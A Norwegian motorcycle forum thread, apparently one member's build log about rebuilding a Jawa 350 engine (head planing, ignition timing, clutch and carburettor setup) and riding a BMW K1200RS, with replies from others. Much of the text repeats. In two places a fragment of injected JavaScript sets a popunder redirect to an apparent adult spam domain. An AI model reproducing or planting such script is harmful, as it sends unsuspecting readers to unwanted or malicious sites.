Fredriks BMW-blogg "Flying Brick" K1200RS
- FredrikE24
- Innlegg: 4734
- Registrert: 24 apr 2016, 18:53
- Motorsykkelen din: BMW K1200RS
- Sted: Nordre Follo
Re: Fredriks BMW-blogg "Flying Brick" K1200RS + Jawa 350
Det er alltids håp. Etter å ha drøftet problemet med at toppene er skjeive opp og ned, så klarte man etterhvert å finne en måte å plane toppene i riktig hjemmemekk-"ånd". Etter å ha sittet i en slags tankesmie med min far siste døgnet om problemet, så har man forsøkt å finne mulige løsninger.
Vi var ganske tidlig enige om at vi trengte noe som kunne slipe kun området som ligger ann mot sylinderen. Man trengte noe i perfekt diameter. Etter å ha lett i noen timer i en rund skive av noe slag jeg kunne lime fast noe slipepapir til eller lignende, så fant jeg en kappeskive til vinkelsliper. Den var litt for stor.
Så jeg satt den på vinkelsliperen og begynte å kappe i filler en stein i hagen. Etterhvert ble den i perfekt diameter.
Så ble den festet til søyleboremaskinen man har i garasjen, og sylindertoppene lagt under. Bormaskinen ble "reimet" om til maksimal hastighet. Så ble kappeskiva satt ned på sylindertoppen og hele greia jevnet pent ut.
Så heiv man de tilbake på motoren, og dratt til med korrekt moment. Kjente litt på kicken, og du verden og kompresjon det er nå :)
Så har man visst ordnet de skjeive toppene "godt nok" allikevel. Nye topper er på vei, så de finner vel veien på motoren etterhvert når de ankommer. Inntil videre fungerer vel motoren bra nå antar jeg.
Får montere litt videre før det blir oppstart
Tenningsanlegget kommer på plass: Så er forgasser hektet på: Svinghjul på: Lyddemperne i pottene er ute for demontering og nye skiver. Her ser man lekkasje på ene toppen:
Vi var ganske tidlig enige om at vi trengte noe som kunne slipe kun området som ligger ann mot sylinderen. Man trengte noe i perfekt diameter. Etter å ha lett i noen timer i en rund skive av noe slag jeg kunne lime fast noe slipepapir til eller lignende, så fant jeg en kappeskive til vinkelsliper. Den var litt for stor.
Så jeg satt den på vinkelsliperen og begynte å kappe i filler en stein i hagen. Etterhvert ble den i perfekt diameter.
Så ble den festet til søyleboremaskinen man har i garasjen, og sylindertoppene lagt under. Bormaskinen ble "reimet" om til maksimal hastighet. Så ble kappeskiva satt ned på sylindertoppen og hele greia jevnet pent ut.
Så heiv man de tilbake på motoren, og dratt til med korrekt moment. Kjente litt på kicken, og du verden og kompresjon det er nå :)
Så har man visst ordnet de skjeive toppene "godt nok" allikevel. Nye topper er på vei, så de finner vel veien på motoren etterhvert når de ankommer. Inntil videre fungerer vel motoren bra nå antar jeg.
Får montere litt videre før det blir oppstart
Tenningsanlegget kommer på plass: Så er forgasser hektet på: Svinghjul på: Lyddemperne i pottene er ute for demontering og nye skiver. Her ser man lekkasje på ene toppen:
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.
- FredrikE24
- Innlegg: 4734
- Registrert: 24 apr 2016, 18:53
- Motorsykkelen din: BMW K1200RS
- Sted: Nordre Follo
Re: Fredriks BMW-blogg "Flying Brick" K1200RS + Jawa 350
Liten video av første oppstart her:
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Nå begynner det imidlertid å bli så møkkete og rotete i garasjen at jeg er glad for at ting går mot en ende! Det har vært mange timer på å skru på dette spetakkelet nå, men er gøy når det faktisk starter og går på første
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Nå begynner det imidlertid å bli så møkkete og rotete i garasjen at jeg er glad for at ting går mot en ende! Det har vært mange timer på å skru på dette spetakkelet nå, men er gøy når det faktisk starter og går på første
- FredrikE24
- Innlegg: 4734
- Registrert: 24 apr 2016, 18:53
- Motorsykkelen din: BMW K1200RS
- Sted: Nordre Follo
Re: Fredriks BMW-blogg "Flying Brick" K1200RS + Jawa 350
Litt mer fremgang. Kanskje det blir en prøvetur imorra!
Justering av tenning. Det skal være ca. 2,5mm fortenning, altså føre øvre dødpunkt.
Det gjøres med denne dingsen. Skrues i plugghullet og motor roteres til bolten snur fra å gå oppover med stempelet til nedover. Akkurat i det den snur har vi nådd øvre dødpunkt. Da dreies motoren ca. 2,5mm bakover(nedover) og tenningstidspunktet settes der. Kjedegangen settes på plass. Alt er et lukket system for at ikke sand og drit skal komme inn. Så monteres det som kalles for clutchautomaten. Hvordan man vil clutche er helt valgfritt. Om man ser på kammen til venstre, så er denne direkte koblet til girakslingen. Når man bruker girpedalen, opp eller ned, vil clutcharmen skyves på i samme retning som clutchwire ev. Ville dratt i mekanismen.
Så for å justere dette korrekt, slaktes wire helt, og skruen i midten skrues innover til armen legges inntil kammen til girpedalen. Så drar man inn ev. Slakk i clutchwire ved å stramme wire etterpå. Clutchwire er på en måte «slaven» i systemet.
Kjempenyttig i kuldegrader når clutchwire somregel har frosset fast uansett!
Justering av tenning. Det skal være ca. 2,5mm fortenning, altså føre øvre dødpunkt.
Det gjøres med denne dingsen. Skrues i plugghullet og motor roteres til bolten snur fra å gå oppover med stempelet til nedover. Akkurat i det den snur har vi nådd øvre dødpunkt. Da dreies motoren ca. 2,5mm bakover(nedover) og tenningstidspunktet settes der. Kjedegangen settes på plass. Alt er et lukket system for at ikke sand og drit skal komme inn. Så monteres det som kalles for clutchautomaten. Hvordan man vil clutche er helt valgfritt. Om man ser på kammen til venstre, så er denne direkte koblet til girakslingen. Når man bruker girpedalen, opp eller ned, vil clutcharmen skyves på i samme retning som clutchwire ev. Ville dratt i mekanismen.
Så for å justere dette korrekt, slaktes wire helt, og skruen i midten skrues innover til armen legges inntil kammen til girpedalen. Så drar man inn ev. Slakk i clutchwire ved å stramme wire etterpå. Clutchwire er på en måte «slaven» i systemet.
Kjempenyttig i kuldegrader når clutchwire somregel har frosset fast uansett!
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.
Re: Fredriks BMW-blogg "Flying Brick" K1200RS + Jawa 350
Artig verktøy for å finne TDC
Lykke til med prosjektet videre
Lykke til med prosjektet videre
Sist redigert av Janners den 17 mai 2018, 20:33, redigert 1 gang totalt.
- FredrikE24
- Innlegg: 4734
- Registrert: 24 apr 2016, 18:53
- Motorsykkelen din: BMW K1200RS
- Sted: Nordre Follo
Re: Fredriks BMW-blogg "Flying Brick" K1200RS + Jawa 350
Ikke bare finner den TDC, men hver strek er en millimeter, så er de strekene man bruker for å finne riktig tenningstidspunkt :) Meget kjekt!
Jawa 350 anbefales til vinterbruk. Kan ikke si jeg har savnet noe annet å kjøre i vinter. Den fungerer ypperlig!
Jawa 350 anbefales til vinterbruk. Kan ikke si jeg har savnet noe annet å kjøre i vinter. Den fungerer ypperlig!
- Jompa
- Moderator
- Innlegg: 6990
- Registrert: 08 jan 2011, 14:52
- Motorsykkelen din: Triumph Sprint GT 1050
- Sted: Alta
Re: Fredriks BMW-blogg "Flying Brick" K1200RS + Jawa 350
Starta Jawaen virkelig på første forsøket som i filmen ?
Har litt sans for slipemetoden din
Har litt sans for slipemetoden din
De svake øyeblikkene er de beste øyeblikkene.
- FredrikE24
- Innlegg: 4734
- Registrert: 24 apr 2016, 18:53
- Motorsykkelen din: BMW K1200RS
- Sted: Nordre Follo
Re: Fredriks BMW-blogg "Flying Brick" K1200RS + Jawa 350
Nå har jeg trampa en del på kicken for å høre etter om kompen forsvant mellom sylinder og topp noen ganger. Så man kan vel si at den var godt primet for en første start :)
Så er denne Jikov-gassern som sitter på disse Jawaene originalt temmelig håpløse når det gjelder kaldstart. De har ikke skikkelig choke, men sånn overfyllingsopplegg.. Denne motoren har i grunn startet på første eller andre tråkk hele vintern gjennom :)
Sitter en Mikuni i den nå, en standard roundslide. Forrige eier satt på en flatslide Mikuni før jeg kjøpte den, mente at den fikk en bedre gange av det. Men den manglet fintuning og gikk særs dårlig med den på.
Flatslidere er vanskeligere å få til å gå skikkelig, og jeg hadde ikke nok dyser å velge i liggende for den. Roundslide-mikunien fikk jeg også med sykkelen sammen med en original Jikov(også helt ny). Roundslidern hadde jeg ekstra dyser til liggende, så fikk tuna den godt inn.
Kanskje jeg skal prøve å få flatsliden til å gå skikkelig etterhvert, vi får se.
Så er denne Jikov-gassern som sitter på disse Jawaene originalt temmelig håpløse når det gjelder kaldstart. De har ikke skikkelig choke, men sånn overfyllingsopplegg.. Denne motoren har i grunn startet på første eller andre tråkk hele vintern gjennom :)
Sitter en Mikuni i den nå, en standard roundslide. Forrige eier satt på en flatslide Mikuni før jeg kjøpte den, mente at den fikk en bedre gange av det. Men den manglet fintuning og gikk særs dårlig med den på.
Flatslidere er vanskeligere å få til å gå skikkelig, og jeg hadde ikke nok dyser å velge i liggende for den. Roundslide-mikunien fikk jeg også med sykkelen sammen med en original Jikov(også helt ny). Roundslidern hadde jeg ekstra dyser til liggende, så fikk tuna den godt inn.
Kanskje jeg skal prøve å få flatsliden til å gå skikkelig etterhvert, vi får se.
Sist redigert av FredrikE24 den 03 mai 2018, 22:53, redigert 1 gang totalt.
- FredrikE24
- Innlegg: 4734
- Registrert: 24 apr 2016, 18:53
- Motorsykkelen din: BMW K1200RS
- Sted: Nordre Follo
Re: Fredriks BMW-blogg "Flying Brick" K1200RS + Jawa 350
Det å kjøre Bimmer er temmelig flott
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.
Re: Fredriks BMW-blogg "Flying Brick" K1200RS + Jawa 350
Å kjøre den Bimmern og ha den Jawan er to forskjelige lidenskaper, men begge veldig bra!
Veldig fin, cool , morsom og interessant tråd du har !
Veldig fin, cool , morsom og interessant tråd du har !
"Do the right thing"
- Jompa
- Moderator
- Innlegg: 6990
- Registrert: 08 jan 2011, 14:52
- Motorsykkelen din: Triumph Sprint GT 1050
- Sted: Alta
Re: Fredriks BMW-blogg "Flying Brick" K1200RS + Jawa 350
En av de pene årsmodellene av K1200 , den sykkelen din.
De svake øyeblikkene er de beste øyeblikkene.
- FredrikE24
- Innlegg: 4734
- Registrert: 24 apr 2016, 18:53
- Motorsykkelen din: BMW K1200RS
- Sted: Nordre Follo
Re: Fredriks BMW-blogg "Flying Brick" K1200RS + Jawa 350
Må si at jeg er særs fornøyd med presatsjonene i den nybygde motoren
Trekker meget bra på lavt turtall og nå kicker den faktisk på 4krpm og helt opp til de svimlende 6krpm som rødmerkinga står på. Enda vil den trekke mer.. Før var det ikke sjangs å dra den særlig over 5,8krpm.
Den nye veiva har gjort underverker med vibrasjonene, men det er jo ikke borte, men man må vel regne med såpass på en slik tosylindret sak
Å nå 110km/h på nåla er også null problem, da snakker vi tett oppunder 140km/h Speedometeret viser altfor lite, da speedometerdrevet sitter på girkassa, og tar ikke hensyn omdreving eller dekkdimensjon naturligvis. Nå kjører jeg på 18T drev forran, det absolutt største som det er plass til.. Originalt lurer jeg på om det er 13T eller 14T som skal sitte der. I en normal 60-sone, så er alt ok om trafikken flyter i førr, femåførr. I starten var det jo helt håpløst inntil jeg innså at speedometer viser altfor lite
Er jo ikke noe moro å kjøre BMWen til Oslo sentrum, den er så mainstream. Kjører man Jawa derimot, så kommer det masse gamlinger rekende og skal prate om jernet mitt
Trekker meget bra på lavt turtall og nå kicker den faktisk på 4krpm og helt opp til de svimlende 6krpm som rødmerkinga står på. Enda vil den trekke mer.. Før var det ikke sjangs å dra den særlig over 5,8krpm.
Den nye veiva har gjort underverker med vibrasjonene, men det er jo ikke borte, men man må vel regne med såpass på en slik tosylindret sak
Å nå 110km/h på nåla er også null problem, da snakker vi tett oppunder 140km/h Speedometeret viser altfor lite, da speedometerdrevet sitter på girkassa, og tar ikke hensyn omdreving eller dekkdimensjon naturligvis. Nå kjører jeg på 18T drev forran, det absolutt største som det er plass til.. Originalt lurer jeg på om det er 13T eller 14T som skal sitte der. I en normal 60-sone, så er alt ok om trafikken flyter i førr, femåførr. I starten var det jo helt håpløst inntil jeg innså at speedometer viser altfor lite
Er jo ikke noe moro å kjøre BMWen til Oslo sentrum, den er så mainstream. Kjører man Jawa derimot, så kommer det masse gamlinger rekende og skal prate om jernet mitt
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.
- FredrikE24
- Innlegg: 4734
- Registrert: 24 apr 2016, 18:53
- Motorsykkelen din: BMW K1200RS
- Sted: Nordre Follo
Re: Fredriks BMW-blogg "Flying Brick" K1200RS + Jawa 350
God søndagsstemning, kjenner dog Holmenkollstafetten godt i beina.. Ikke bare bare for meg å løpe nesten 2km når jeg normalt bare kjører sykkel/bil Er temmelig stiv og støl..
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.
- Jompa
- Moderator
- Innlegg: 6990
- Registrert: 08 jan 2011, 14:52
- Motorsykkelen din: Triumph Sprint GT 1050
- Sted: Alta
Re: Fredriks BMW-blogg "Flying Brick" K1200RS + Jawa 350
Sånn har æ ikke parkert siden mopedtida.
De svake øyeblikkene er de beste øyeblikkene.
- FredrikE24
- Innlegg: 4734
- Registrert: 24 apr 2016, 18:53
- Motorsykkelen din: BMW K1200RS
- Sted: Nordre Follo
Re: Fredriks BMW-blogg "Flying Brick" K1200RS + Jawa 350
Siden jeg har hjemmevakt på jobben fra imorgen ettermiddag av, så måtte jeg benytte fridagen til å kjøre sykkel. I hjemmevakt, så må jeg holde meg rundt Oslo grunnet responstider ved utrykning etc.
Så ble rett over 50mil med BMWen i Telemark. Noen kaffestopp og Softice her og der på veien!
Hadde på de høyeste fjelltoppene 6 varmegrader, og i lavlandet 22-23 grader og deilig luft
Så ble rett over 50mil med BMWen i Telemark. Noen kaffestopp og Softice her og der på veien!
Hadde på de høyeste fjelltoppene 6 varmegrader, og i lavlandet 22-23 grader og deilig luft
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.
- FredrikE24
- Innlegg: 4734
- Registrert: 24 apr 2016, 18:53
- Motorsykkelen din: BMW K1200RS
- Sted: Nordre Follo
Re: Fredriks BMW-blogg "Flying Brick" K1200RS + Jawa 350
Natteravnene gjør lokalt en viktig jobb for ungdommen vil jeg påstå. Jeg kjører MC-ravn noen ganger ila. en sesong. Ungdommen synes det er kult med motorsykkel og det er fint å snakke litt med ungdommen som er ute også.
Siden man sliter med å få folk til å være med å kjøre, så er det greit å bidra litt med å få flere inn.
Derfor sto jeg på stand på Tyrigrava på Onsdag. Dit kom også Østlandets blad og lagde en reportasje.
Vi fikk vervet overraskende mange nye
Siden man sliter med å få folk til å være med å kjøre, så er det greit å bidra litt med å få flere inn.
Derfor sto jeg på stand på Tyrigrava på Onsdag. Dit kom også Østlandets blad og lagde en reportasje.
Vi fikk vervet overraskende mange nye
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.